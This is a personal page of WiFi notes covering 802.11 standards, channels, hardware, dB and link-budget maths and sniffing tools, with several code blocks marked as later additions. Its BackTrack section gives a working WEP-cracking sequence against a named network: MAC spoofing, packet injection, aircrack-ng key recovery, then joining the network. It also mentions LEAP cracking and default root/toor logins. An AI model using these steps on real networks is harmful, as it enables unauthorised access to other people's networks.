
Wireless networks

Dedicated to Jordi Buzón.
You really know how to motivate me.


WiFi environment

802.11a (wiki) - The 802.11a standard uses the same core protocol as the original standard (ratified in 1999), operates in 5 GHz band, and uses a 52-subcarrier orthogonal frequency-division multiplexing (OFDM) with a maximum raw data rate of 54 Mbit/s, which yields realistic net achievable throughput in the mid-20 Mbit/s.

Using the 5 GHz band gives 802.11a a significant advantage, since the 2.4 GHz band is heavily used to the point of being crowded. Degradation caused by such conflicts can cause frequent dropped connections and degradation of service. However, this high carrier frequency also brings a slight disadvantage: the effective overall range of 802.11a is slightly less than that of 802.11b/g; 802.11a signals cannot penetrate as far as those for 802.11b because they are absorbed more readily by walls and other solid objects in their path.

2.4GHz only allows for 3 channels without an overlap - these are 1, 6 and 11. See list of wlan channels.

Wi-Fi (Wireless Fidelity) standard
Standard : 802.11b (1091 K). 802.11a is used by NATO in Europe.
Architecture : Get all 802 !
Frequency band : 2,400 - 2,4835 GHz (Industrial Scientific Medical Band).
Spanish legislation : see S5.150 in S5_1.doc of Section III : layout of the frequency band allocation table. Channel 10-11 (Spain).

f (bottom of band) = 2,4 GHz => λ = 12,5 cm. f (top of band) = 2,4835 GHz => λ = 12,08 cm.

A common design for antennas is to make them 1/4 of a wavelength or less in length.

2,462 GHz is channel 11
Transfer rate : 11 Mbps
Radio type : frequency hopping spread spectrum (FHSS)
Modulation : QFSK, BFSK, DBPSK
Hardware comparisons : Seattle
Receive sensitivity : FreeNetworks
Mind the security : AirSnort cracks the encryption keys ! And so does WEPCrack !

ExtremeTech says :

 WEP (wired-equivalent privacy) = encryption scheme for wireless traffic.
 Tools are readily available to break 40-bit WEP in a few minutes, and 128-bit WEP keys can be broken in a few days.

AiroPeek (protocol analyzer) aims to fix this.

IBM says :

Existing security for 802.11 wireless consists of two subsystems : a data encryption technique called Wired Equivalent Privacy (WEP) and an authentication method, either Shared Key or 802.1x. Both the encryption and authentication are optional, and wireless access points are typically shipped with both turned off.

And it has the DWSA.
An article with the essentials of home WiFi security.

WEP security

New WEP cracking tools : WEP.HTM

"WPA Cracking" ... "128 Bit WEP cracking" here "The minimum number of characters for a WPA-PSK passphrase is 8. The maximum is 63."

At my place :

    SSID    Security Type   Encryption   Cipher  Aut   Radio Type
    ------  --------------  -----------  -----   ----  -----------
    belkin  WPA2            AES          CCMP    PSK   802.11n
            WPA             TKIP                 PSK   802.11g

Wireless A, B, G and N

IEEE 802.11n is a wireless networking standard created to improve network throughput over the two prior standards : Wireless-G (54 Mbps) or even Wireless-B (11 Mbps).

Wireless-N increased the maximum data transmission rate more than tenfold from 54 Mbps to 600-900 Mbps.

2,4 GHz and 5 GHz

The 2.4 GHz band is used for Wireless-G, and the 5 GHz for Wireless-N only.

All of the versions of Wi-Fi up to and including 802.11n (a, b, g, n) operate between the frequencies of 2400 and 2500 MHz. These 100 MHz are separated into 14 channels of 20 MHz each (overlapping).

The great thing about 5 GHz (802.11n and 802.11ac) is that because there’s much more free space at the higher frequencies, it offers 23 non-overlapping 20 MHz channels.

When setting the channels on your APs, try to stick with 1, 6, or 11. They are the only channels that don’t overlap. (2,4 GHz)

AUTO channel selection

AP and CSA (channel switch announcement) frames

The Channel Switch Announcement element is used by an AP in a BSS, a STA in an IBSS, or a mesh STA in an MBSS to advertise when it is changing to a new channel and the channel number of the new channel.

DFS is a spectrum-sharing mechanism that allows wireless LANs (WLANs) to coexist with radar systems.

If your AP wants to use a 5 GHz channel, it needs to support Dynamic Frequency Selection (DFS for short). If interference is detected after the AP has started, it sends a Channel Switch Announcement telling the stations that the AP will change channel after the next X beacons. The stations must obey or they will be disconnected.
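The beacon behaviour described above, as an added example that is not part of the original page: a parser for the Channel Switch Announcement element and a tracker that follows one AP through the switch. The SSID, channel numbers and beacon bodies are constructed samples; element ID 37 and its three-byte mode / new channel / count layout are from IEEE 802.11.

```python
import struct

EID_SSID, EID_DS_PARAMS, EID_CSA = 0, 3, 37   # IEEE 802.11 element IDs
FIXED_LEN = 12    # timestamp (8) + beacon interval (2) + capabilities (2)
TU_MS = 1.024     # one 802.11 time unit (TU) in milliseconds


def iter_elements(buf):
    """Yield (element_id, data) for every tagged element; reject truncation."""
    off = 0
    while off < len(buf):
        if off + 2 > len(buf):
            raise ValueError("truncated element header")
        eid, length = buf[off], buf[off + 1]
        data = buf[off + 2:off + 2 + length]
        if len(data) != length:
            raise ValueError("truncated element body")
        yield eid, data
        off += 2 + length


def parse_beacon_body(body):
    """Parse a beacon frame body (the bytes after the 24-byte MAC header)."""
    if len(body) < FIXED_LEN:
        raise ValueError("beacon body shorter than its fixed fields")
    _timestamp, interval_tu, _capab = struct.unpack_from("<QHH", body, 0)
    info = {"ssid": None, "channel": None, "csa": None,
            "beacon_interval_tu": interval_tu}
    for eid, data in iter_elements(body[FIXED_LEN:]):
        if eid == EID_SSID:
            info["ssid"] = data.decode("utf-8", "replace")
        elif eid == EID_DS_PARAMS and len(data) == 1:
            info["channel"] = data[0]
        elif eid == EID_CSA:
            if len(data) != 3:
                raise ValueError("CSA element must carry exactly 3 bytes")
            mode, new_channel, count = data
            # mode 1: stations must stay silent until the switch; 0: no limit
            info["csa"] = {"mode": mode, "new_channel": new_channel,
                           "count": count}
    return info


def follow_switch(bodies):
    """Follow consecutive beacons of one BSSID and report the channel switch.

    Returns a list of events:
      ("announce", old_channel, new_channel, ms_until_switch)
      ("switched", channel) or ("mismatch", channel) for the first beacon
      seen after the countdown ends.
    """
    events, pending = [], None
    for body in bodies:
        b = parse_beacon_body(body)
        if b["csa"]:
            if pending is None:
                ms = b["csa"]["count"] * b["beacon_interval_tu"] * TU_MS
                events.append(("announce", b["channel"],
                               b["csa"]["new_channel"], round(ms, 1)))
            pending = b["csa"]["new_channel"]
        elif pending is not None:
            kind = "switched" if b["channel"] == pending else "mismatch"
            events.append((kind, b["channel"]))
            pending = None
    return events


def build_beacon(ssid, channel, csa=None, interval_tu=100):
    """Build a constructed sample beacon body (not a capture)."""
    raw = ssid.encode("ascii")
    body = struct.pack("<QHH", 0, interval_tu, 0x0001)
    body += bytes([EID_SSID, len(raw)]) + raw
    body += bytes([EID_DS_PARAMS, 1, channel])
    if csa is not None:
        body += bytes([EID_CSA, 3, *csa])
    return body


# Constructed sample: an AP on channel 52 announces a move to channel 36
# "after the next 3 beacons", counts down, then beacons on the new channel.
SAMPLE = [build_beacon("example-ap", 52, (1, 36, n)) for n in (3, 2, 1)]
SAMPLE.append(build_beacon("example-ap", 36))

if __name__ == "__main__":
    for event in follow_switch(SAMPLE):
        print(event)
```
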


A free scanner utility is Nirsoft’s WifiInfoView, which doesn’t even require installation. Just unzip and run it, and check out all of the networks using each channel.

Range extender

If we want our own "travelling" network and to connect to the Internet only occasionally, we need a setup like this one, where link (1) can hardly be a cable (we are in a hotel) :

   public network     <- . ->  Albert's private network      . ->  Albert's terminals
                         .                                   .
 .---------------.       .       .---------------.           .        .--------.
 |    Router     |  (1) LAN/WAN  |    Router     |      (2) LAN/WAN   |  mac   |
 |    hotel      | ======.====== |    Albert     | ==========.======  '--------'
 |     (a)       |       .       |     (b)       |           .        .--------.
 '---------------'       .       '---------------'           .        |  rspi  |
                                                                      '--------'

See FastLane !

The problem is that the Internet password provided by router (a) has to be entered manually on every terminal that connects to router (b).



Servers (Access Point)

Clients : wireless cards, Wi-Fi cards (802.11b)

  • Lucent

  • Orinoco (15 dbm power output)

  • Apple Airport

  • Cisco

  • Linksys

  • D-Link : DWL-650 PCMCIA is cheap and has Linux support

  • Edimax
    • PCMCIA
      • EW-7102PC = Wireless LAN PCMCIA adapter (*linux*)
      • EW-7103PC = Wireless LAN PCMCIA adapter (*linux*)
    • USB
      • EW-7112U = Wireless LAN USB adapter
      • EW-7115U = Wireless LAN USB adapter
    • PCI
      • EW-7122 = Wireless LAN PCI adapter (*linux*)
      • EW-7123 = Wireless LAN PCI adapter

  • Surecom
    • PC Card : EP-9427
    • USB Card : EP-9001

  • Jordi has an Edimax PCMCIA card, EW-7102 PC
    On the Edimax site, section "products" + "wireless" :
    • EW-7103 PC : pcmcia wireless network adapter, 12 dBm output power (typ), -80 dBm receiver sensitivity (min). Coverage area : closed space (25m).
    • EW-7123 PC : pci wireless network adapter
    • EW-7205 AP : access point. Data packet bridging between wireless network (802.11b) and Ethernet network (802.3). Operating range : open space (100-300m), indoor (35-100m).
    For the workstations with USB, Jordi has an Edimax 7115-U

  • Bulma recommends Conceptronic.
    Note : in BCN it can be found at Pricoinsa & JUMP (IE only) [Rda Sn Antoni, 38] & FNAC
    The Conceptronic PCI C11iDT comes with an external antenna !

  • In Seattle they recommend Lucent Silver/Gold (Hermes chipset)
    On the Prism chipset, there are a lot of manufacturers.

  • Araceli has a Conceptronic Wireless 54Mbps USB adapter

  • SAG has a wifi card !

  • A wifi dongle is a common name for a wireless USB adapter, which is the same thing as a WiFi card except it uses a USB interface instead of PCI or PCIe.

  • Monitor mode is one of the six modes that 802.11 wireless cards can operate in:
    • Master (acting as an access point),
    • Managed (client, also known as station),
    • Ad-hoc,
    • Mesh,
    • Repeater,
    • and Monitor mode

    More detail : {wireless.kernel.org}




Edimax EW-7115U

  • Library : Transmit power = 15 dBm, Receive sensitivity = -80 dBm.
  • datasheet or PDF
  • Torrelles :
    2 workstations connected once we set "AdHoc" + (E)SSID
  • W2K :
    • Install under W2k :
      do not plug the USB adapter until the Application setup has been completed
      To install the drivers and the "Configuration & Monitor utility", run setup.exe from the CD.
    • Uninstall under W2k :
      • to remove the "Monitor & Configuration utility", select "Uninstall Configuration & Monitor utility" option (Start -> Programs -> Amter 802.11 Wireless LAN). It is recommended to stop the USB adapter and "Exit" the application !
      • to uninstall the USB adapter, select it in the Device Manager, and press "Uninstall" - can be performed only if the USB adapter is plugged in
  • Linux + USB : Atmel AT76C503 based wireless USB devices. VID=0x03EB, PID=0x7603, MAC=AT6C503A, Radio=RFMD (not Intersil).
    Another similar (identical) place
    How to build and install the GPL drivers.
    Another HowTo.
    SuSE 8.0 (and more) specifics (config).

US Robotics 9106



9106 Specifications [url]

    * Network address translation (NAT)
    * Integrated 802.11g (54Mbps) wireless access point
          o 54Mbps data rate with auto fallback
          o 2 x detachable 2 dBi reverse SMA antennas
          o Support for WEP and WPA-PSK
          o Mac address filtering
          o Disable SSID
    * Integrated ADSL modem - 1 x RJ11 connection - speed ?
    * 4 x 10/100Base-T auto MDI-MDIX RJ45 switched LAN ports
    * Built-in firewall with stateful packet inspection (SPI)
    * Integrated DHCP server
    * Virtual private network (VPN) pass-through
    * UPnP enabled
    * DMZ hosting and port forwarding
    * Web-based & remote configuration
    * 2 year manufacturer warranty



 The model of the ADSL Wireless Gateway :
 Model 9106 - USR209106

My Wifi cards & routers
P4 / Airis : Canyon CN-WF511

Chipset & driver by manufacturer : url

Mine : URL

Standard = 802.11g, Product ID = CN-WF511, Interface = PCI, Chipset = Ralink (chip RT2560F), Driver = rt2x00, Works with Linux = green.

Comments - driver available from manufacturer: http://web.ralinktech.com/ralink/Home/Support/Linux.html
=> http://rt2400.sourceforge.net/
=> http://rt2x00.serialmonkey.com, or http://sourceforge.net/projects/rt2400.

3 photos :


Ubuntu lspci says : Intel Corp. PRO/Wireless 2200 BG (rev 05)
So, it is a IPW2200 BG card

Standard = 802.11g, Product ID = 2200BG, Vendor and product code = man:8086 dev:4220, Interface = mini-PCI, Chipset = IPW2200, Driver = ipw2200, Works with Linux = green
Comments : http://ipw2200.sourceforge.net/


T400 (Apr 2010)
Integrated card

XP says : Intel(R) WiFi Link 5100 AGN ; mac = 00:22:FA:D1:5A:90 ; driver = NETw5x32.sys ;

AIR-PCM352 (pcmcia)

XP says : "Cisco Systems 350 Series PCMCIA Wireless Adapter" ; driver = pcx500.sys ;
soft, download.

Belkin Play N600, model F7D4101v2 (Oct 2014)

Play N600 USB Wireless N Dual Band.

Help (Spain) : 902.02 43 66

ISO (146 MB)

MTV, 201512 : Comtrend

5813 photo, manual [default, "1234"]

Portal Alejandra - router configuration

Admin pwd
100 Mbps

"Wireless -> Advanced", we change :


MTV, 201601 : HUAWEI ONT HG 8240

The Echo Life HG8240 is an indoor optical network terminal (ONT) of the Huawei FTTH solution. Using GPON technology, it offers ultra-broadband access for residential users and small businesses. It provides two POTS ports and four auto-sensing GE/FE Ethernet ports.


Optical fibre
SAG Belkin N300 wireless N router, model F9K1002v5 (May 2015)

Default values :

Tech stuff

  • Free Networks
  • dB = 10 * log(a/b) ; 'a' and 'b' is power in mW
  • dBm = 10 * log(P) ; for dBm, 'b' is 1 mW.
  • a dBm is a power level referenced to 1 milliwatt => 0 dBm = 1 mW.
  • 1 W => 10 log 1000 mW / 1 mW = 10 log 1000 = 10 * 3 = +30 dBm
  • 100 mW = +20 dBm
  • 10 mW = +10 dBm
  • doubling the power increases the reading by slightly more than 3 decibels, actually close to 3.010299 dB : 10 * log(base 10) 2 = 3,01029995664
  • 3 dBm + 3 dB = 6 dBm ( 2 mW * 2 = 4 mW )
  • 3 dBm - 3 dBm = 0 dB ( 2 mW / 2 mW = 1 )
  • mW to dBm
  • dBm to mW
  • wiki dBm



    dB (log, + 3 dB)    ratio (x 2)
    ----------------    -----------
     0                     1
     3                     2
     6                     4
     9                     8
    10                    10
    12                    16
    15                    32
    18                    64
    20                   100
    21                   128
    24                   256
    27                   512
    30                  1024
    30                  1000



Free-space signal loss :

  Loss = 32 + 20 x Log ( F x D )
 Loss = free space path loss in dB
 F = operating frequency in MHz
 D = distance in km
 Include a fade margin of about 10 dB ...
So for a simple example, how far can a pair of Wavelan cards get with the little supplied patch antennas of 8 dBi ? The answer is :
 Tx power = + 20 dBm
 Combined antenna gains = 16 ( 8 + 8 )
 Rx sensitivity = -74 dBm
 Total link budget = 20 + 16 - ( -74 ) = 110 dB
 Max distance = 4 km approx

 loss = 32 + 20 x log (2450 x 4) = 111.

 With 10 dB margin we have :

    100 dB > 32 + 20 x log ( 2450 x d )
     68/20 > log ( 2450 x d )
     10 exp (68/20) / 2450 > d
     d < 1,025 km

Bluetooth uses 1mW to reach 10 m [verify]
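The dBm conversions and the link-budget derivation above, carried through in code as an added example (not from the original page). It uses the page's constant of 32 in the loss formula and the page's Wavelan figures; the function names and the list of transmit levels in `range_vs_tx_power` are assumptions made for the illustration, which also shows how far the free-space footprint shrinks when transmit power is lowered.

```python
import math

FSPL_CONST_DB = 32.0   # constant from the page's formula (F in MHz, D in km)


def mw_to_dbm(p_mw):
    """Power in mW to dBm (0 dBm = 1 mW)."""
    return 10 * math.log10(p_mw)


def dbm_to_mw(p_dbm):
    """Power in dBm to mW."""
    return 10 ** (p_dbm / 10)


def free_space_loss_db(f_mhz, d_km):
    """Loss = 32 + 20 x Log(F x D), as written on the page."""
    return FSPL_CONST_DB + 20 * math.log10(f_mhz * d_km)


def link_budget_db(tx_dbm, antenna_gains_dbi, rx_sensitivity_dbm):
    """Total loss the link can tolerate before the receiver goes deaf."""
    return tx_dbm + antenna_gains_dbi - rx_sensitivity_dbm


def max_distance_km(budget_db, f_mhz, fade_margin_db=10.0):
    """Solve budget - margin = 32 + 20 log(F x D) for D."""
    allowed_loss = budget_db - fade_margin_db
    return 10 ** ((allowed_loss - FSPL_CONST_DB) / 20) / f_mhz


def range_vs_tx_power(tx_levels_dbm, antenna_gains_dbi, rx_sensitivity_dbm,
                      f_mhz, fade_margin_db=10.0):
    """Free-space range for several transmit levels.

    Returns rows of (tx_dbm, tx_mw, range_km). Because loss grows with
    20 log(D), the range halves for every 6 dB (a quarter of the power)
    removed from the transmitter.
    """
    rows = []
    for tx in tx_levels_dbm:
        budget = link_budget_db(tx, antenna_gains_dbi, rx_sensitivity_dbm)
        rows.append((tx, dbm_to_mw(tx),
                     max_distance_km(budget, f_mhz, fade_margin_db)))
    return rows


if __name__ == "__main__":
    # Wavelan figures from the page: +20 dBm, 8 + 8 dBi, -74 dBm, 2450 MHz
    budget = link_budget_db(20, 16, -74)
    print("budget: %d dB" % budget)
    print("no margin   : %.2f km" % max_distance_km(budget, 2450, 0))
    print("10 dB margin: %.3f km" % max_distance_km(budget, 2450))
    print("loss at 4 km: %.1f dB" % free_space_loss_db(2450, 4))
    # Assumed transmit levels, stepping down 6 dB at a time
    for tx, mw, km in range_vs_tx_power([20, 14, 8, 2], 16, -74, 2450):
        print("%3d dBm (%6.1f mW) -> %.3f km" % (tx, mw, km))
```
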



  • Wlan Primer and FAQs

    Every device (wireless card) in an 802.11 network is known as a station (abbreviated STA). A collection of stations that communicate with each other is known as a Basic Service Set (BSS), which covers a certain Basic Service Area (BSA). Stations that are not within the BSA can't directly participate in a BSS with each other.
    When stations are participating in a BSS, they share a common set of network parameters. They all transmit/receive on the same channel, they understand the same data rates, they use a common BSSID, and they are synchronized to the same timer. In a BSS, all of those parameters are broadcast in beacon frames that are sent at a regular interval.
    Two BSS's could coincidentally share the same channel, common data rates, and timer, so some unique identifier is necessary. That unique identifier is a 6-byte number that identifies the BSS (the BSSID). Packets in a BSS, in addition to being addressed from one station to another, also include the BSSID.
    There are two kinds of BSS's: the independent BSS (IBSS) and the infrastructure BSS.
    An IBSS is usually an ad-hoc network, and they're meant for peer-to-peer networking. An IBSS resembles a bunch of computers on the same Ethernet segment--they can all hear each other, and packets are sent directly to the recipient. In an IBSS, all of the stations are responsible for sending beacons, and the BSSID is randomly generated.
    In an infrastructure BSS, there is exactly one access point (AP). When one station wishes to send data to another station, the packet is sent first to the AP, and then the AP delivers the packet. The BSSID of an infrastructure BSS is the MAC address of the AP's station interface, and the AP is the only station that sends out beacons. The AP is sometimes known as the BSS master, and the other stations are BSS clients.
    802.11 networks grow by combining infrastructure BSS's into larger Extended Service Sets (ESS's), which cover Extended Service Areas (ESA's). In order for stations in one BSS to talk to stations in other BSS's, the stations must take advantage of distribution system services (DSS). The distribution system (DS) is the magical thing that connects BSS's into one ESS, and it's defined by the services that AP's connected to the DS provide.

  • SSID = Service Set Identifier.
    32-byte string that identifies an IBSS or an ESS (or a single infrastructure BSS). It's often called the network name or ESSID. The SSID is a unique ID given to the Access Point.
    Wireless clients associating to any Access Point must have the same SSID. Alternatively, "ANY" (all characters in upper case) may be used.
    BSSID - basestation ID. (Access Point MAC address)

  • Infrastructure = with Access Point, AdHoc = without Access Point.

    In Ad-Hoc mode : Ad-Hoc network is a group of computers, each with a WLAN adapter, connected as an independent wireless LAN. All stations in the WLAN should set the same ESSID and operation channel. Each node (station) acts as a router for the other nodes. See Snoop
    In Infrastructure mode : an integrated wireless and wired LAN is called an Infrastructure configuration. Set the ESSID to be the same with the AP you associate to.

  • RTS threshold - mechanism implemented to prevent the "hidden node" problem.
    A packet size is specified, and the RTS/CTS mechanism will be activated if the packet size exceeds the specified value.

  • pigtail - a (short, flexible) cable that has an N connector at one end, to screw on the antenna, and at the other end a specific connector that fits our wireless hardware. Few pictures

Get a packet monitoring tool for wireless LAN

See Sniffer 4.6 [12 dolars]
AirMagnet Duo complementing Sniffer Wireless article
And Snort [for W2K]
Here is a wireless kismet scanner (requires driver in promiscuous mode). Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
Windows ones :
  • SpyNet sniffer : CaptureNet v3.12 + PeepNet => "Iris" Network Traffic Analyzer
  • CommView v2.0 sniffer
Read about Anti-Sniff. Also about packets and protocols ! Even points to GG243376 !
In Win2000Mag also ! [NT only !]
 AntiSniff exploits the method NT uses to handle packets by sending a packet to the system
 using an Ethernet address of FF:00:00:00:00:00
 and the IP destination address of the system you want to check.
 When a network card is operating in promiscuous mode in NT,
 it will respond to the packet that AntiSniff has sent,
 revealing that a packet sniffer might be active on the system.

 For its DNS tests, AntiSniff puts itself in promiscuous mode
 and sends a packet out on the network using a predetermined IP address
 in the packet header. If a packet sniffer is listening on the network
 and configured, as some are, to perform reverse
 DNS lookups for the packets it captures, then the system running the
 packet sniffer will transmit a reverse DNS lookup request for the IP
 address in the packet AntiSniff sent.
 The product captures that particular action (the reverse DNS lookup),
 tricking the packet sniffer into revealing itself on the network.
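The DNS test described above, seen from the monitoring side, as an added example (not AntiSniff's code and not from the original page): it parses captured DNS query payloads and reports which hosts asked for the reverse name of a decoy address that no host has a legitimate reason to resolve. The decoy address (from the 192.0.2.0/24 documentation range), the host addresses and the captured payloads are constructed.

```python
import ipaddress
import struct

QTYPE_A, QTYPE_PTR, QCLASS_IN = 1, 12, 1


def parse_question(payload):
    """Return (qname, qtype) of the first question of a DNS query.

    Returns None for responses and for messages without a question;
    raises ValueError on malformed input.
    """
    if len(payload) < 12:
        raise ValueError("shorter than a DNS header")
    _txid, flags, qdcount, _an, _ns, _ar = struct.unpack_from("!HHHHHH", payload)
    if flags & 0x8000 or qdcount < 1:      # QR bit set = response
        return None
    off, labels = 12, []
    while True:
        if off >= len(payload):
            raise ValueError("truncated name")
        length = payload[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0:                  # compression pointer: not expected
            raise ValueError("compressed name in question")
        label = payload[off:off + length]
        if len(label) != length:
            raise ValueError("truncated label")
        labels.append(label.decode("ascii", "replace").lower())
        off += length
    if off + 4 > len(payload):
        raise ValueError("truncated question")
    qtype, _qclass = struct.unpack_from("!HH", payload, off)
    return ".".join(labels), qtype


def find_reverse_lookups(decoy_ip, observed):
    """Hosts that sent a PTR query for the decoy address.

    observed: iterable of (source_ip, dns_payload_bytes).
    Malformed payloads are skipped rather than aborting the scan.
    """
    wanted = ipaddress.ip_address(decoy_ip).reverse_pointer.lower()
    suspects = set()
    for src, payload in observed:
        try:
            question = parse_question(payload)
        except ValueError:
            continue
        if question == (wanted, QTYPE_PTR):
            suspects.add(src)
    return sorted(suspects)


def build_query(name, qtype, txid=0x1234):
    """Build a constructed sample DNS query (not a capture)."""
    qname = b"".join(bytes([len(part)]) + part.encode("ascii")
                     for part in name.split(".")) + b"\x00"
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + qname + struct.pack("!HH", qtype, QCLASS_IN)


DECOY = "192.0.2.77"   # constructed decoy address, used only in the bait packet

# Constructed traffic seen on the wire after the bait packet was sent
SAMPLE = [
    ("10.0.0.5", build_query("example.com", QTYPE_A)),
    ("10.0.0.8", build_query("9.0.0.10.in-addr.arpa", QTYPE_PTR)),
    ("10.0.0.23", build_query("77.2.0.192.in-addr.arpa", QTYPE_PTR)),
    ("10.0.0.9", b"\x00\x01"),             # malformed, must be ignored
]

if __name__ == "__main__":
    print(find_reverse_lookups(DECOY, SAMPLE))
```
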

Other network analyzers :

List of sniffers : http://www.packetattack.com/wireless.html - and more ! [*****]

War driving : MacStumbler (Airport wireless cards only)

Read about WEP


Auditor Security Collection

From here

BackTrack is the result of the merging of the two innovative penetration testing live linux distributions Auditor security collection and Whax. : BackTrack download : v3 Beta - 14-12-2007, v4 bt4-beta.iso 02/2009. 2010 new home : http://www.backtrack-linux.org/.

See also WifiSlax (v 3.1, 683 MB, at 2007/12 has kernel, meaning no "iwlagn" for T400), KisMet, Stumbler (Windows). Nice Blog.

2017 - now it is Kali

Centuriones !

Kernel := 2.6.6 ! [10/01/2005]
MacChanger :

     -s eth0 => 00.02.8A.3C.31.4F
     -s eth1 => 00.09.6B.86.5C.57
     -m => provide New AA.BB.CC.DD.EE.FF

Auditor-200605-02 : !IMPORTANT!!
This version has two different ISO versions, because the Intel B and the Intel B/G card drivers IPW2100 and IPW2200 does not work well in cooperation. While B cards does not seem to have a problem, systems with B/G cards (ipw2200) seemed to hang during boot. To overcome this problem (until the drivers are fixed) we release two iso's of the CD to support your needs. If you want to be able to use Auditor Security Collection on a system with an IPW2200 card you need to download the "-no-ipw2100" version of the iso otherwise it will not boot. A system with B card based on IPW2100 will work with it, but no driver will be loaded for the B only card. If you never run it on a System with IPW2200 take the "ipw2100" version, the ipw2100 driver is included in this version.

List of tools.
Device list


Homepage : http://www.backtrack-linux.org/, but drac is from Legacy Filmworks ! (2014) -> Kali

To start BT4 :

  • network : /etc/init.d/networking start ;
  • KDE : startx ;
  • FVWM : bt4-crystal ;
Tools in BT4

The utilities included in BT4 are :

  • aircrack-ng -
  • airmon-ng -
  • AirSnarf -
  • ASLEAP - Automated LEAP attack tool - tool to crack Cisco LEAP, August, 2003. SourceForge.
  • Cowpatty -
  • Genpmk -
  • Kismet - Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. url
  • MacChanger -

wifi cards

To display card manufacturer to Linux driver compliance : http://linux-wless.passys.nl/.
How to display vendor & product code :

    # lspci -vv | grep Intel          {for a PCI card : read here}
    00:0b.0 Network controller: Intel Corporation PRO/Wireless 2200BG (rev 05)
            Subsystem: Intel Corporation: Unknown device 2702

Now, look for the device number:

    # lspci -n | grep 00:0b.0
    00:0b.0 Class 0280: 8086:4220 (rev 05)

Arcadi Acer Aspire 5741

    $ lspci
    03:00.0 Network controller : Broadcom Corporation device 4357 (rev 01)
            Subsystem : Foxconn International Inc, device E021
            Kernel driver in use : wl
    # lspci -n | grep 03:00.0
    03:00.0 0280: 14e4:4357 (rev 01)

BCM page has moved to b43 driver page.

When booting BT4, I find

    $ cat /var/log/messages | grep Broadcom
    bt kernel: eth0: Broadcom BCM4357 802.11 Wireless Controller

Also I find

    $ iwconfig
    eth0  IEEE802.11bgn  ESSID:""  Nickname:""
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated

It does not allow switching to snooping (monitor) mode :

    $ iwconfig eth0 mode monitor
    SET failed on device eth0: invalid argument.

But it can be configured if we know the key :

    $ iwconfig eth0 mode managed

Irina Acer Aspire 6930

    $ lspci
    07:00.0 Network controller : Intel Corporation, Wireless WiFi Link 5100
            Kernel driver in use : iwlagn
            Kernel modules : iwlagn
    $ lspci -n | grep 07:00.0
    07:00.0 0280: 8086:4232

ipw5100 uses iwlagn driver : green, wlan type := 802.11a/n, vendor & product code := man: 8086 dev: 4237, mini-PCIe.

In the log I find :

    $ cat /var/log/messages
    bt kernel: iwlagn 0000:07:00.0 Detected Intel Wireless WiFi Link 5100AGN REV=0x54

Our device is wlan0 :

    $ iwconfig
    wlan0  IEEE802.11abgn  ESSID:""
           Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated

We configure it :

    $ ifconfig wlan0 down
    $ macchanger -m 00:11:22:33:44:55 wlan0
    Current MAC: 00:21:5d:4c:3e:d0 (unknown)
    Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)
    $ iwconfig wlan0 mode monitor
    $ ifconfig wlan0 up

Let's get to work :

    $ airodump-ng wlan0
        see the networks : WLAN_C5, ch 3, BSSID 00:19:15:4F:92:AA ;
    $ airodump-ng --channel 3 wlan0
        see only the data on channel 3
    $ airodump-ng -c 3 -w test --bssid 00:19:15:4F:92:AA wlan0
        wait for #Data packets (do not close the window !)
    $ aireplay-ng -1 0 (-e WLAN_C5) -a 00:19:15:4F:92:AA -h 00:11:22:33:44:55 wlan0
        do associate to router
    $ aireplay-ng -3 -b 00:19:15:4F:92:AA -h 00:11:22:33:44:55 wlan0
        inject packets so that #Data rises faster, up to 10.000 !
    $ aircrack-ng -b 00:19:15:4F:92:AA test-01.cap
        decrypt : wait "KEY FOUND"
    $ iwconfig wlan0 mode managed key 31:32:33:34:35:36:37:38:39:30:31:32.33
        connect to the router with the key
    $ dhcpcd wlan0
        get IP
    $ ifconfig wlan0
        display configuration
    $ ping www.google.es
        use Internet ;

BT forums.

  • boot CD
  • login as "root" / "toor"
  • either :
    • "startx" = start the X Window environment
    • "xconf" = configure the graphics card
    • "ifconfig eth0 up" = bring up the local network
    • "pump" / "dhclient" = get an IP from the DHCP server
    • if there are problems, check /var/log/messages or /var/log/syslog
  • Airis P4 : Canyon CN-WF511 Ralink RT2500 Wireless LAN Card => RT2500 chipset Driver URL ; card description ; driver download {win} ; T42:\Fonts\WireLess\Drivers\P4_Airis\rt2500-1.0.0.tar.gz
  • T42 : Intel Corp. PRO/Wireless 2200 BG (rev 05)
  • fragmentation attack / get PRGA - Sample.
    • configure wireless :
      iwconfig ra0 rate 1M channel 6 mode monitor
    • start airodump :
      airodump-ng --ivs -w clave -c 6 ra0


LEAP is ...

Asleap is ... - Automated LEAP attack tool. Another tool : LEAP cracker.

few links : Flim; VT - blog.


Your Movistar Internet includes :

Price : 33,8843 €/month - 11,6500 € (Movistar Internet promotion, for 12 months)

Router "fibre-optic access equipment GPT-2541 GNAC 00412926". It is a "Mitrastar". Cipher : WPA2-PSK. Encryption : AES.

W500 can connect to MOVISTAR_PLUS_BCD1 at 5 GHz.

Tracking myIP and speed at Movistar

SpeedTest or WhatIsMyIP or IPinfo says :

    20160318 -
    20160319 -
    20160402 -
    20160410 -
    20160425 -
    20160516 - {returning to enxaneta from wlangas2}
    20160529 -
    20160606 -
    20160608 -
    20160705 -
    20160711 -
    20160719 -
    20161024 - [73 Mbps down, 32 up]
    20161028 - {via Android !!! ???}
    20161130 -
    20170201 -
    20170622 -, 118 Mbps down, 188 Mbps up
    20170821 -, 98/96 {wifi "enx"} - 170/180 {wifi bcd1} - 281/283 {cable}
    20171022 - : enx 88/100, plus 206/233, cable 308/309

    c:\> tracert -d {PLUS_BCD1}
    Tracing route to over a maximum of 30 hops
      1   183 ms     1 ms     2 ms
      2   206 ms     2 ms     2 ms
      3   216 ms     *        8 ms
      4   234 ms     5 ms     4 ms
      5    25 ms    12 ms    13 ms
      6     *        *        *     Request timed out.
      7    32 ms     9 ms     7 ms
      8   216 ms     9 ms    10 ms
      9     *        *        *     Request timed out.

    C:\> tracert -d {BCD1}
    Tracing route to over a maximum of 30 hops
      1     2 ms     2 ms     3 ms
      2    42 ms     5 ms     4 ms
      3     7 ms     7 ms     6 ms    {20160402} {20161130}
      4     *        *        *     Request timed out.

Router administration
Restore factory defaults

With the router powered on, press the Reset button (the last one on the right at the back) for at least 10 seconds. After 90 seconds, the router will be back to its factory defaults.

